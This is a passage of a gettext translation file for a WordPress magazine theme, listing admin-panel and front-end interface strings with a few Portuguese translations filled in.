msgstr "" #: backend/mega-menu.php:240 backend/panels/socials.php:171 msgid "" "Please ensure that Font Awesome is enabled in \"Theme Options > Theme Design " "> Font Awesome\" if you use this font icon classname." msgstr "" #: backend/single-metaboxes.php:373 msgid "" "Please ensure that the \"Audio\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/single-metaboxes.php:420 msgid "" "Please ensure that the \"Gallery\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/single-metaboxes.php:318 msgid "" "Please ensure that the \"Video\" option is chosen under \"Post Format\" " "selection box when you use this panel." msgstr "" #: backend/panels/design.php:616 msgid "" "Please ensure that you are using trusted svg sources to avoid XML " "vulnerabilities." msgstr "" #: templates/single/review-comment.php:86 msgid "Please select a rating!" msgstr "" #: backend/panels/header.php:53 msgid "" "Please select setting panel corresponding to the layout you choose for " "setting up background, color and other settings." msgstr "" #: backend/panels/newsletter.php:21 msgid "" "Please update cover images to your own images after importing the theme demo." msgstr "" #: templates/entry.php:1345 msgid "Please update WordPress to the latest version to display this audio." msgstr "" #: templates/entry.php:1292 msgid "Please update WordPress to the latest version to display this video." msgstr "" #: backend/class-tgm-plugin-activation.php:2641 msgid "Plugin" msgstr "" #: backend/class-tgm-plugin-activation.php:399 #: backend/class-tgm-plugin-activation.php:3253 backend/install-plugins.php:81 msgid "Plugin activated successfully." msgstr "" #: backend/class-tgm-plugin-activation.php:3252 msgid "Plugin activation failed." msgstr "" #: backend/class-tgm-plugin-activation.php:404 #, php-format msgid "" "Plugin not activated. A higher version of %s is needed for this theme. " "Please update the plugin." msgstr "" #: backend/panels/single-post.php:362 msgid "Policy Text" msgstr "" #: backend/panels/single-post.php:1388 backend/panels/single-post.php:1394 msgid "Popular Section" msgstr "" #: backend/panels/newsletter.php:77 msgid "Popup Expired" msgstr "" #: backend/panels/newsletter.php:14 backend/panels/newsletter.php:27 msgid "Popup Newsletter" msgstr "" #: backend/panels/bookmark.php:44 msgid "Popup Notification" msgstr "" #: backend/panels/header.php:518 msgid "Popup Sign In" msgstr "" #: backend/configs.php:855 msgid "Portrait (300x1050)" msgstr "" #: templates/single/review-comment.php:51 msgid "Post a Review" msgstr "" #: backend/category-settings.php:365 backend/category-settings.php:381 #: backend/panels/block-classic.php:73 backend/panels/block-grid.php:73 #: backend/panels/block-grid.php:238 backend/panels/block-grid.php:403 #: backend/panels/block-grid.php:576 backend/panels/block-grid.php:763 #: backend/panels/block-list.php:81 backend/panels/block-list.php:254 #: backend/panels/block-list.php:435 backend/panels/block-list.php:630 #: backend/panels/blog-pages.php:408 backend/panels/blog-pages.php:895 #: backend/panels/blog-pages.php:1309 backend/panels/blog-pages.php:1717 #: backend/panels/blog-pages.php:2209 backend/panels/bookmark.php:307 #: backend/panels/bookmark.php:755 msgid "Post Format Icon" msgstr "" #: backend/panels/design.php:470 msgid "Post Format Icons" msgstr "" #: backend/single-metaboxes.php:205 msgid "Post highlights" msgstr "" #: backend/single-metaboxes.php:187 msgid "Post Options" msgstr "" #: backend/single-metaboxes.php:471 msgid "Post Review" msgstr "" #: backend/panels/optimized.php:160 msgid "Post Review Markup" msgstr "" #: backend/single-metaboxes.php:771 msgid "Post Sources" msgstr "" #: backend/panels/single-post.php:296 msgid "Post Tags Bar" msgstr "" #: backend/panels/table-contents.php:23 msgid "Post Type Supported" msgstr "" #: backend/single-metaboxes.php:792 msgid "Post Via" msgstr "" #: backend/panels/design.php:131 msgid "Post View Meta Icon" msgstr "" #: backend/install-plugins.php:48 msgid "Post Views Counter" msgstr "" #: backend/panels/optimized.php:216 msgid "Postal Code" msgstr "" #: templates/entry.php:367 templates/entry.php:401 msgid "Posted" msgstr "" #: templates/entry.php:1159 msgid "Posted by" msgstr "" #: backend/panels/single-post.php:1347 msgid "Posts from Where" msgstr "" #: backend/category-settings.php:164 backend/panels/blog-pages.php:708 msgid "Posts Per Page" msgstr "" #: backend/category-settings.php:169 backend/panels/blog-pages.php:172 #: backend/panels/blog-pages.php:177 backend/panels/blog-pages.php:713 #: backend/panels/blog-pages.php:1123 backend/panels/blog-pages.php:1128 #: backend/panels/blog-pages.php:1532 backend/panels/blog-pages.php:1537 #: backend/panels/blog-pages.php:2024 backend/panels/blog-pages.php:2029 #: backend/panels/bookmark.php:561 msgid "Posts per Page" msgstr "" #: backend/class-tgm-plugin-activation.php:2392 msgid "Pre-Packaged" msgstr "" #: backend/panels/design.php:257 msgid "Prefix" msgstr "" #: backend/panels/optimized.php:74 msgid "Preload Font Icon" msgstr "" #: backend/panels/optimized.php:67 msgid "Preload Google Fonts" msgstr "" #: backend/panels/design.php:641 msgid "Prevent WordPress convert gif to a static image when uploading." msgstr "" #: backend/single-metaboxes.php:338 msgid "Preview Video" msgstr "" #: templates/parts.php:348 msgid "Previous" msgstr "" #: templates/single/templates.php:1016 msgid "Previous Article" msgstr "" #: templates/single/templates.php:564 msgid "Previous Page" msgstr "" #: backend/panels/woocommerce.php:188 msgid "Price Color" msgstr "" #: backend/panels/woocommerce.php:253 msgid "Price Font" msgstr "" #: backend/single-metaboxes.php:592 msgid "Price Offer" msgstr "" #: backend/panels/single-post.php:487 backend/single-metaboxes.php:267 msgid "Primary Category" msgstr "" #: backend/panels/heading.php:49 backend/panels/heading.php:134 msgid "Primary Heading Color" msgstr "" #: backend/panels/single-post.php:822 backend/panels/single-post.php:961 #: backend/panels/single-post.php:1099 backend/panels/single-post.php:1713 msgid "Print" msgstr "" #: backend/panels/privacy.php:14 msgid "Privacy Bar" msgstr "" #: backend/panels/privacy.php:7 msgid "Privacy Notice" msgstr "" #: backend/panels/woocommerce.php:237 msgid "Product Title Font" msgstr "" #: backend/panels/woocommerce.php:71 msgid "Products per Page" msgstr "" #: backend/panels/design.php:110 msgid "Published Date Icon" msgstr "" #: backend/panels/single-post.php:269 backend/panels/single-post.php:275 msgid "Quick View Info" msgstr "" #: templates/single/review-comment.php:89 msgid "Rate…" msgstr "" #: backend/panels/reaction.php:31 msgid "Reaction Heading" msgstr "" #: backend/panels/reaction.php:37 msgid "Reaction Items" msgstr "" #: backend/panels/reaction.php:23 msgid "Reaction Section" msgstr "" #: backend/configs.php:409 backend/panels/design.php:275 msgid "read (Reading Time)" msgstr "" #: templates/template-helpers.php:238 templates/template-helpers.php:382 msgid "Read More" msgstr "Leia mais" #: backend/category-settings.php:425 backend/panels/block-classic.php:106 #: backend/panels/block-grid.php:106 backend/panels/block-grid.php:271 #: backend/panels/block-grid.php:436 backend/panels/block-grid.php:609 #: backend/panels/block-grid.php:796 backend/panels/block-list.php:114 #: backend/panels/block-list.php:287 backend/panels/block-list.php:468 #: backend/panels/block-list.php:663 backend/panels/blog-pages.php:453 #: backend/panels/blog-pages.php:940 backend/panels/blog-pages.php:1354 #: backend/panels/blog-pages.php:1762 backend/panels/blog-pages.php:2254 #: backend/panels/bookmark.php:352 backend/panels/bookmark.php:800 #: backend/panels/design.php:535 backend/panels/typography.php:530 msgid "Read More Button" msgstr "" #: backend/panels/typography.php:538 msgid "Read More Font" msgstr "" #: backend/panels/design.php:549 msgid "Read More Icon" msgstr "" #: backend/panels/design.php:543 msgid "Read More Label" msgstr "" #: backend/panels/single-post.php:1564 msgid "Reading Font Resizer" msgstr "" #: backend/panels/single-post.php:1736 backend/panels/single-post.php:1745 msgid "Reading Indicator" msgstr "" #: backend/panels/bookmark.php:88 backend/panels/bookmark.php:106 #: templates/header/templates.php:710 msgid "Reading List" msgstr "" #: backend/panels/bookmark.php:98 msgid "Reading List Header" msgstr "" #: backend/panels/design.php:160 msgid "Reading Speed" msgstr "" #: backend/panels/single-post.php:661 backend/panels/single-post.php:667 msgid "Reading Time" msgstr "" #: backend/panels/design.php:138 msgid "Reading Time Meta Icon" msgstr "" #: templates/single/templates.php:1485 msgid "Reading:" msgstr "Leitura:" #: templates/blog.php:497 msgid "Ready to publish your first post?" msgstr "" #: templates/blog.php:17 #, php-format msgid "" "Ready to publish your first post? Get started here." msgstr "" #: backend/class-tgm-plugin-activation.php:2370 backend/panels/bookmark.php:502 msgid "Recommended" msgstr "" #: backend/panels/bookmark.php:520 msgid "Recommended for You" msgstr "" #: backend/panels/bookmark.php:512 msgid "Recommended Heading" msgstr "" #: backend/panels/design.php:315 msgid "Recommended select the top position if you have people images." msgstr "" #: backend/panels/single-post.php:777 backend/panels/single-post.php:916 #: backend/panels/single-post.php:1054 backend/panels/single-post.php:1681 #: templates/parts.php:639 msgid "Reddit" msgstr "" #: backend/panels/socials.php:128 msgid "Reddit URL " msgstr "" #: backend/panels/header.php:527 backend/panels/login.php:95 msgid "Redirect links should be inner links." msgstr "" #: backend/panels/login.php:93 msgid "Redirect Settings" msgstr "" #: backend/panels/bookmark.php:56 msgid "Redirect to Login for Guest Users" msgstr "" #: backend/panels/login.php:104 msgid "Redirect to this link after logged in." msgstr "" #: backend/panels/header.php:619 backend/panels/login.php:112 msgid "Redirect to this link after successful logout." msgstr "" #: backend/panels/login.php:58 msgid "Redirect to this link when clicking on the logo." msgstr "" #: backend/panels/dark-mode.php:36 msgid "Reduce the featured image opacity when enabled the dark mode." msgstr "" #: backend/panels/sidebar.php:15 msgid "" "Refresh your browser after creating new sidebars to update your changes." msgstr "" #: templates/popup.php:206 msgid "Register" msgstr "" #: backend/panels/single-post.php:1249 msgid "Related & Popular" msgstr "" #: backend/panels/single-post.php:1304 msgid "Related Heading" msgstr "" #: backend/panels/amp.php:222 backend/panels/single-post.php:1290 #: backend/panels/single-post.php:1296 msgid "Related Section" msgstr "" #: backend/panels/single-post.php:1266 msgid "Related Shortcode" msgstr "" #: bookmark/template-helpers.php:30 templates/entry.php:286 msgid "Remove" msgstr "Remover" #: backend/panels/amp.php:69 msgid "Remove Footer Switcher" msgstr "" #: backend/panels/amp.php:70 msgid "Remove the \"Exit Mobile Version\" link at the footer." msgstr "" #: bookmark/bookmark.php:56 msgid "Removed from reading list" msgstr "" #: backend/configs.php:426 msgid "Replace for Entry Meta" msgstr "" #: backend/class-tgm-plugin-activation.php:2367 msgid "Required" msgstr "" #: backend/class-tgm-plugin-activation.php:2421 msgid "Required Update not Available" msgstr "" #: backend/class-tgm-plugin-activation.php:2424 msgid "Requires Update" msgstr "" #: templates/header/templates.php:758 msgid "Resizer" msgstr "Redimensionador" #: backend/category-settings.php:465 backend/panels/block-classic.php:129 #: backend/panels/block-grid.php:129 backend/panels/block-grid.php:294 #: backend/panels/block-grid.php:459 backend/panels/block-grid.php:632 #: backend/panels/block-grid.php:819 backend/panels/block-list.php:137 #: backend/panels/block-list.php:310 backend/panels/block-list.php:491 #: backend/panels/block-list.php:686 backend/panels/blog-pages.php:490 #: backend/panels/blog-pages.php:977 backend/panels/blog-pages.php:1391 #: backend/panels/blog-pages.php:1799 backend/panels/blog-pages.php:2291 #: backend/panels/bookmark.php:389 backend/panels/bookmark.php:837 msgid "Responsive - Hide Entry Category" msgstr "" #: backend/category-settings.php:495 backend/panels/block-classic.php:155 #: backend/panels/block-grid.php:155 backend/panels/block-grid.php:320 #: backend/panels/block-grid.php:485 backend/panels/block-grid.php:658 #: backend/panels/block-grid.php:845 backend/panels/block-list.php:163 #: backend/panels/block-list.php:336 backend/panels/block-list.php:517 #: backend/panels/block-list.php:712 backend/panels/blog-pages.php:520 #: backend/panels/blog-pages.php:1007 backend/panels/blog-pages.php:1421 #: backend/panels/blog-pages.php:1829 backend/panels/blog-pages.php:2321 #: backend/panels/bookmark.php:411 backend/panels/bookmark.php:867 msgid "Responsive - Hide Excerpt" msgstr "" #: backend/panels/general.php:48 msgid "Restore/Backup" msgstr "" #: backend/panels/general.php:55 msgid "Restore/Backup Theme Options" msgstr "" #: backend/panels/logo.php:62 msgid "Retina Main Logo" msgstr "" #: templates/blog.php:22 msgid "Return to Home" msgstr "" #: templates/blog.php:505 templates/page.php:145 msgid "Return to Homepage" msgstr "Voltar a página inicial" #: backend/class-tgm-plugin-activation.php:397 backend/install-plugins.php:80 msgid "Return to Required Plugins Installer" msgstr "" #: backend/class-tgm-plugin-activation.php:398 #: backend/class-tgm-plugin-activation.php:920 #: backend/class-tgm-plugin-activation.php:2627 #: backend/class-tgm-plugin-activation.php:3674 msgid "Return to the Dashboard" msgstr "" #: backend/single-metaboxes.php:466 msgid "Review" msgstr "" #: backend/panels/single-post.php:1156 msgid "Review & Rating" msgstr "" #: templates/single/review-comment.php:43 msgid "Review Closed!" msgstr "" #: backend/single-metaboxes.php:534 msgid "Review Image" msgstr "" #: backend/category-settings.php:373 backend/panels/block-classic.php:58 #: backend/panels/block-grid.php:58 backend/panels/block-grid.php:223 #: backend/panels/block-grid.php:388 backend/panels/block-grid.php:561 #: backend/panels/block-grid.php:748 backend/panels/block-list.php:66 #: backend/panels/block-list.php:239 backend/panels/block-list.php:420 #: backend/panels/block-list.php:615 backend/panels/blog-pages.php:392 #: backend/panels/blog-pages.php:879 backend/panels/blog-pages.php:1293 #: backend/panels/blog-pages.php:1701 backend/panels/blog-pages.php:2193 #: backend/panels/bookmark.php:291 backend/panels/bookmark.php:739 msgid "Review Meta" msgstr "" #: backend/panels/block-classic.php:66 backend/panels/block-grid.php:66 #: backend/panels/block-grid.php:231 backend/panels/block-grid.php:396 #: backend/panels/block-grid.php:569 backend/panels/block-grid.php:756 #: backend/panels/block-list.php:74 backend/panels/block-list.php:247 #: backend/panels/block-list.php:428 backend/panels/block-list.php:623 #: backend/panels/blog-pages.php:400 backend/panels/blog-pages.php:887 #: backend/panels/blog-pages.php:1301 backend/panels/blog-pages.php:1709 #: backend/panels/blog-pages.php:2201 backend/panels/bookmark.php:299 #: backend/panels/bookmark.php:747 msgid "Review Meta Description" msgstr "" #: backend/single-metaboxes.php:499 msgid "Review Overview" msgstr "" #: backend/single-metaboxes.php:870 msgid "Review Schema Markup" msgstr "" #: backend/panels/color.php:132 msgid "Review Star Color" msgstr "" #: backend/panels/woocommerce.php:204 msgid "Review Start Color" msgstr "" #: backend/single-metaboxes.php:496 msgid "Review Title" msgstr "" #: backend/single-metaboxes.php:503 msgid "Review Type" msgstr "" #: backend/configs.php:181 backend/configs.php:545 backend/configs.php:824 #: backend/panels/login.php:42 msgid "Right" msgstr "" #: backend/panels/design.php:665 backend/panels/design.php:672 msgid "Round Corner" msgstr "" #: templates/parts.php:651 msgid "Rss" msgstr "" #: backend/panels/socials.php:152 msgid "Rss URL " msgstr "" #: backend/panels/design.php:305 msgid "" "Run regenerate thumbnail if you add/remove crop sizes. Please read " "documentation for further information." msgstr "" #: backend/panels/reaction.php:43 msgid "Sad" msgstr "" #: backend/panels/woocommerce.php:220 msgid "Sale Icon Background" msgstr "" #: backend/panels/single-post.php:1352 backend/panels/single-post.php:1449 msgid "Same Categories" msgstr "" #: backend/panels/single-post.php:1351 msgid "Same Tags" msgstr "" #: backend/panels/single-post.php:1350 msgid "Same Tags & Categories" msgstr "" #: bookmark/template-helpers.php:29 msgid "Save it" msgstr "Salve isso" #: backend/single-metaboxes.php:509 msgid "Score (1 > 10)" msgstr "" #: backend/single-metaboxes.php:526 msgid "Score (1 > 10) or Rating (1 > 5)" msgstr "" #: backend/panels/ads.php:101 backend/panels/ads.php:290 msgid "Script" msgstr "" #: backend/panels/ads.php:130 backend/panels/ads.php:319 msgid "Script - Ad Size" msgstr "" #: backend/panels/ads.php:122 backend/panels/ads.php:311 msgid "Script - Ad/Adsense Code" msgstr "" #: backend/panels/ads.php:141 backend/panels/ads.php:330 msgid "Script - Size on Desktop" msgstr "" #: backend/panels/ads.php:157 backend/panels/ads.php:346 msgid "Script - Size on Mobile" msgstr "" #: backend/panels/ads.php:149 backend/panels/ads.php:338 msgid "Script - Size on Tablet" msgstr "" #: backend/panels/ads.php:116 backend/panels/ads.php:305 msgid "Script Settings" msgstr "" #: backend/panels/newsletter.php:96 msgid "Scroll Distance" msgstr "" #: backend/panels/blog-pages.php:1886 backend/panels/header.php:190 #: searchform.php:18 templates/header/templates.php:345 templates/parts.php:477 msgid "Search" msgstr "Buscar" #: templates/header/templates.php:349 templates/parts.php:485 msgid "search" msgstr "buscar" #: templates/parts.php:474 msgid "Search and hit enter..." msgstr "" #: backend/panels/blog-pages.php:1895 msgid "Search Filter" msgstr "" #: searchform.php:14 msgid "Search for:" msgstr "" #: backend/panels/blog-pages.php:2418 msgid "Search Form" msgstr "" #: backend/panels/blog-pages.php:1961 msgid "Search Header" msgstr "" #: backend/panels/header.php:187 msgid "Search Heading" msgstr "" #: backend/panels/general.php:36 searchform.php:9 templates/parts.php:480 msgid "Search Headlines, News..." msgstr "" #: templates/blog.php:232 #, php-format msgid "Search Results for: %s" msgstr "Resultados da busca por: %s" #: templates/single/templates.php:1587 msgid "Section" msgstr "" #: backend/panels/ads.php:221 msgid "Section Background" msgstr "" #: backend/panels/bookmark.php:111 backend/panels/bookmark.php:454 msgid "Section Description" msgstr "" #: backend/panels/bookmark.php:104 backend/panels/bookmark.php:447 #: backend/panels/bookmark.php:518 msgid "Section Heading" msgstr "" #: backend/mega-menu.php:204 backend/panels/header.php:141 msgid "Section Width" msgstr "" #: backend/panels/footer.php:82 msgid "" "Select \"Use Ruby Template\" under the \"Footer Widgets Layout\" setting if " "you use Ruby Template shortcode." msgstr "" #: backend/panels/header.php:43 msgid "" "Select \"Use Ruby Template\" under the \"Global Header Style\" setting if " "you use Ruby Template shortcode." msgstr "" #: backend/panels/heading.php:75 backend/panels/heading.php:160 msgid "Select a accent color for the heading in the dark mode." msgstr "" #: backend/panels/heading.php:58 backend/panels/heading.php:143 msgid "Select a accent color for the heading." msgstr "" #: backend/panels/header-style.php:219 backend/panels/header-style.php:508 #: backend/panels/header-style.php:774 msgid "Select a accent color when hovering in the dark mode." msgstr "" #: backend/panels/header-style.php:141 backend/panels/header-style.php:285 #: backend/panels/header-style.php:429 backend/panels/header-style.php:696 msgid "Select a accent color when hovering." msgstr "" #: backend/panels/ads.php:98 msgid "Select a ad type for displaying in the top of the website." msgstr "" #: backend/panels/ads.php:286 msgid "Select a ad type for displaying inside the single post content." msgstr "" #: backend/panels/ads.php:417 msgid "Select a align style for the adverts." msgstr "" #: backend/single-metaboxes.php:378 msgid "" "Select a audio layout for this post, It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/panels/woocommerce.php:229 msgid "Select a background color for the \"Add to Cart\" button." msgstr "" #: backend/panels/header.php:483 msgid "Select a background color for the collapse section in the dark mode." msgstr "" #: backend/panels/header.php:430 msgid "Select a background color for the collapse section." msgstr "" #: backend/panels/header.php:463 msgid "" "Select a background color for the mobile navigation bar and quick view " "mobile menu in the dark mode." msgstr "" #: backend/panels/header.php:409 msgid "" "Select a background color for the mobile navigation bar and quick view " "mobile menu." msgstr "" #: backend/panels/header-style.php:192 backend/panels/header-style.php:481 #: backend/panels/header-style.php:747 msgid "" "Select a background color for the navigation bar of this header in the dark " "mode." msgstr "" #: backend/panels/header-style.php:113 backend/panels/header-style.php:401 #: backend/panels/header-style.php:668 msgid "Select a background color for the navigation bar of this header." msgstr "" #: backend/panels/ads.php:537 msgid "" "Select a background color for the slide up toggle button when not activated." msgstr "" #: backend/panels/header-style.php:228 backend/panels/header-style.php:517 #: backend/panels/header-style.php:783 msgid "" "Select a background color for the sub menu and other dropdown sections of " "this header in the dark mode." msgstr "" #: backend/panels/header-style.php:150 backend/panels/header-style.php:438 #: backend/panels/header-style.php:705 msgid "" "Select a background color for the sub menu and other dropdown sections of " "this header." msgstr "" #: backend/panels/single-post.php:1762 msgid "Select a background color for this bar." msgstr "" #: backend/panels/woocommerce.php:221 msgid "Select a background color value for the sale icon." msgstr "" #: backend/panels/color.php:103 msgid "" "Select a background for the dark mode icon (Moon icon) of the dark mode " "switcher button to fit with the main navigation color." msgstr "" #: backend/panels/footer.php:41 msgid "Select a background for the footer in the dark mode: image, color, etc" msgstr "" #: backend/panels/footer.php:31 msgid "Select a background for the footer: image, color, etc" msgstr "" #: backend/panels/ads.php:230 msgid "Select a background for this ad section in the dark mode." msgstr "" #: backend/panels/ads.php:222 msgid "Select a background for this ad section." msgstr "" #: backend/panels/ads.php:507 msgid "Select a background for this section in the dark mode." msgstr "" #: backend/panels/ads.php:501 msgid "Select a background for this section." msgstr "" #: backend/panels/blog-pages.php:1493 msgid "Select a background style for the archive header." msgstr "" #: backend/panels/blog-pages.php:1085 msgid "Select a background style for the author header." msgstr "" #: backend/category-settings.php:93 backend/panels/blog-pages.php:91 msgid "Select a background style for this category header." msgstr "" #: backend/panels/bookmark.php:134 backend/panels/bookmark.php:484 msgid "Select a background style for this heading." msgstr "" #: backend/panels/block-grid.php:527 backend/panels/block-grid.php:714 #: backend/panels/block-list.php:378 backend/panels/block-list.php:573 msgid "Select a box style for the post listing." msgstr "" #: backend/panels/color.php:124 msgid "Select a color for post excerpt text." msgstr "" #: backend/panels/block-list.php:532 backend/panels/block-list.php:727 msgid "" "Select a color for the background or border style in the dark mode or light " "scheme mode." msgstr "" #: backend/panels/block-grid.php:680 backend/panels/block-grid.php:867 msgid "Select a color for the background or border style in the dark mode." msgstr "" #: backend/panels/block-grid.php:673 backend/panels/block-grid.php:860 #: backend/panels/block-list.php:525 backend/panels/block-list.php:720 msgid "Select a color for the background or border style." msgstr "" #: backend/panels/color.php:141 msgid "Select a color for the breadcrumb bar." msgstr "" #: backend/panels/single-post.php:254 msgid "Select a color for the hyperlink underline in the dark mode." msgstr "" #: backend/panels/single-post.php:246 msgid "" "Select a color for the hyperlink underline. Leave blank to set as the global " "color." msgstr "" #: backend/panels/color.php:95 msgid "" "Select a color for the light mode icon (Sun icon) of the dark mode switcher " "button to fit with the main navigation color." msgstr "" #: backend/panels/login.php:80 msgid "Select a color for the login screen." msgstr "" #: backend/panels/ads.php:521 msgid "" "Select a color for the slide up toggle button when activated in the dark " "mode." msgstr "" #: backend/panels/ads.php:513 msgid "Select a color for the slide up toggle button when activated." msgstr "" #: backend/panels/ads.php:529 msgid "Select a color for the slide up toggle button when not activated." msgstr "" #: backend/panels/privacy.php:65 msgid "Select a color for the text in the dark mode." msgstr "" #: backend/panels/privacy.php:49 msgid "Select a color for the text." msgstr "" #: backend/panels/privacy.php:57 msgid "Select a color for this box background in the dark mode." msgstr "" #: backend/panels/privacy.php:41 msgid "Select a color for this box background." msgstr "" #: backend/panels/socials.php:199 backend/panels/socials.php:226 #: backend/panels/socials.php:253 msgid "Select a color for this social icon." msgstr "" #: backend/panels/single-post.php:227 msgid "Select a color value for post hyperlinks in the dark mode." msgstr "" #: backend/panels/single-post.php:219 msgid "Select a color value for post hyperlinks." msgstr "" #: backend/panels/design.php:516 msgid "" "Select a color value for the audio icon. This setting will not apply to " "bottom right layout." msgstr "" #: backend/panels/design.php:508 msgid "" "Select a color value for the gallery icon. This setting will not apply to " "bottom right layout" msgstr "" #: backend/panels/single-post.php:235 msgid "Select a color value for the post hyperlinks." msgstr "" #: backend/panels/woocommerce.php:197 msgid "Select a color value for the product price in the dark mode." msgstr "" #: backend/panels/woocommerce.php:189 msgid "Select a color value for the product price." msgstr "" #: backend/panels/color.php:133 msgid "Select a color value for the star icons." msgstr "" #: backend/panels/woocommerce.php:213 msgid "Select a color value for the stars review in the dark mode." msgstr "" #: backend/panels/woocommerce.php:205 msgid "Select a color value for the stars review." msgstr "" #: backend/panels/design.php:499 msgid "" "Select a color value for the video icon. This setting will not apply to " "bottom right layout" msgstr "" #: backend/panels/newsletter.php:72 msgid "Select a cover image for the box." msgstr "" #: backend/single-metaboxes.php:244 msgid "" "Select a crop size for the featured image in case you would like to control " "the size." msgstr "" #: backend/category-settings.php:329 msgid "" "Select a crop size for the featured image to displaying in this category." msgstr "" #: backend/panels/woocommerce.php:254 msgid "Select a custom font for the product price." msgstr "" #: backend/panels/woocommerce.php:238 msgid "Select a custom font for the product title." msgstr "" #: backend/panels/ads.php:131 backend/panels/ads.php:320 msgid "Select a custom size for this ad if you use adsense ad units." msgstr "" #: backend/panels/color.php:58 msgid "" "Select a dark accent color for your website, This setting apply to single " "header background, gradient colors." msgstr "" #: backend/panels/color.php:87 msgid "" "Select a dark solid background for the dark mode. Leave blank to set it as " "the default." msgstr "" #: backend/panels/single-post.php:1188 msgid "Select a default featured image for the review box." msgstr "" #: backend/panels/heading.php:41 msgid "" "Select a default heading layout for the archives and Elementor blocks for " "your website." msgstr "" #: backend/panels/single-post.php:45 msgid "Select a default layout for the single post pages." msgstr "" #: backend/panels/single-post.php:1165 msgid "Select a default review type for your website." msgstr "" #: backend/panels/design.php:443 msgid "" "Select a effect for the sliders. This setting will be not available for the " "carousel mode." msgstr "" #: backend/panels/design.php:266 msgid "" "Select a fallback meta for displaying when if the post does not have custom " "meta value." msgstr "" #: backend/panels/block-classic.php:32 backend/panels/block-grid.php:32 #: backend/panels/block-grid.php:197 backend/panels/block-grid.php:362 #: backend/panels/block-grid.php:535 backend/panels/block-grid.php:722 #: backend/panels/block-list.php:32 backend/panels/block-list.php:205 #: backend/panels/block-list.php:386 backend/panels/block-list.php:581 #: backend/panels/blog-pages.php:350 backend/panels/blog-pages.php:837 #: backend/panels/blog-pages.php:1251 backend/panels/blog-pages.php:1659 #: backend/panels/blog-pages.php:2151 backend/panels/bookmark.php:250 #: backend/panels/bookmark.php:698 msgid "Select a featured image size to optimize with the columns setting." msgstr "" #: backend/panels/typography.php:654 backend/panels/typography.php:1129 msgid "" "Select a font size (px) for buttons on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:661 backend/panels/typography.php:1136 msgid "" "Select a font size (px) for buttons on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:508 msgid "" "Select a font size (px) for entry meta info on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:515 msgid "" "Select a font size (px) for entry meta info on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:611 msgid "" "Select a font size (px) for input and textarea on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:618 msgid "" "Select a font size (px) for input and textarea on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:60 msgid "" "Select a font size (px) for the body on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:53 msgid "" "Select a font size (px) for the body on the mobile device (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:871 msgid "" "Select a font size (px) for the breadcrumbs bar on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:878 msgid "" "Select a font size (px) for the breadcrumbs bar on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:442 msgid "" "Select a font size (px) for the entry category element on mobile devices " "(max screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:449 msgid "" "Select a font size (px) for the entry category element on tablet devices " "(max screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:99 msgid "" "Select a font size (px) for the excerpt on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:106 msgid "" "Select a font size (px) for the excerpt on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:92 msgid "" "Select a font size (px) for the excerpt. Leave this option blank to set the " "default value." msgstr "" #: backend/panels/typography.php:1057 msgid "" "Select a font size (px) for the heading block on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:1064 msgid "" "Select a font size (px) for the heading block on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/category-settings.php:442 backend/panels/blog-pages.php:469 #: backend/panels/blog-pages.php:956 backend/panels/blog-pages.php:1370 #: backend/panels/blog-pages.php:1778 backend/panels/blog-pages.php:2270 #: backend/panels/bookmark.php:368 backend/panels/bookmark.php:816 msgid "" "Select a font size (px) for the post title in the desktop device. Leave " "blank to set it as the default." msgstr "" #: backend/category-settings.php:458 backend/panels/blog-pages.php:483 #: backend/panels/blog-pages.php:970 backend/panels/blog-pages.php:1384 #: backend/panels/blog-pages.php:1792 backend/panels/blog-pages.php:2284 #: backend/panels/bookmark.php:382 backend/panels/bookmark.php:830 msgid "" "Select a font size (px) for the post title in the mobile device. Leave blank " "to set it as the default." msgstr "" #: backend/category-settings.php:450 backend/panels/blog-pages.php:476 #: backend/panels/blog-pages.php:963 backend/panels/blog-pages.php:1377 #: backend/panels/blog-pages.php:1785 backend/panels/blog-pages.php:2277 #: backend/panels/bookmark.php:375 backend/panels/bookmark.php:823 msgid "" "Select a font size (px) for the post title in the table devices. Leave blank " "to set it as the default." msgstr "" #: backend/panels/typography.php:556 msgid "" "Select a font size (px) for the readmore button on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:563 msgid "" "Select a font size (px) for the readmore button on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:730 msgid "" "Select a font size (px) for the single headline on mobile devices (max " "screen width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:737 msgid "" "Select a font size (px) for the single headline on tablet devices (max " "screen width: 1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:723 #, php-format msgid "" "Select a font size (px) for the single headline or displaying in 66.67% of " "the site width." msgstr "" #: backend/panels/typography.php:787 msgid "" "Select a font size (px) for the single tagline on mobile devices (max screen " "width: 767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:794 msgid "" "Select a font size (px) for the single tagline on tablet devices (max screen " "width: 1024px), Leave this option blank to set the default value." msgstr "" #: 